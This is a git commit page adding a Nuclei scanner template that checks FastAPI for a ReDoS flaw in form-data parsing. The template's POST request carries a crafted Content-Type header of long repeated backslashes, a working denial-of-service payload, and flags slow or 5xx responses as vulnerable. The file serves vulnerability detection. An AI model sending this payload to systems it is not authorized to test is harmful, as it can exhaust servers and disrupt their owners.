daffainfo
/
ai-exploits
mirror of https://github.com/daffainfo/ai-exploits.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added FastAPI DoS nuclei template

main
byt3bl33d3r 2024-05-08 09:38:28 -07:00
parent df616d571b
commit 062a468386
No known key found for this signature in database
GPG Key ID: 46DE7432598195A6
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
fastapi/fastapi_dos.yaml Normal file
View File

@ -0,0 +1,29 @@
id: fastapi-redos
info:
name: Check FastAPI ReDoS Vulnerability in Form Data Parsing
author: DanMcInerney, byt3bl33d3r, nicecatch2000
severity: high
description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header.
reference:
- https://huntr.com/bounties/dd680268-d735-4f33-a358-d827694ab035
classification:
cvss-score: 7.5
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cwe-id: CWE-400 # Resource Exhaustion
tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr
requests:
- method: POST
path:
- "{{BaseURL}}/submit/"
headers:
Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'"
body: "input=1"
matchers-condition: and
matchers:
- type: status
status:
- 500
- 502
- 504
- type: time
time: 5000 # Milliseconds, you may adjust this threshold based on expected response times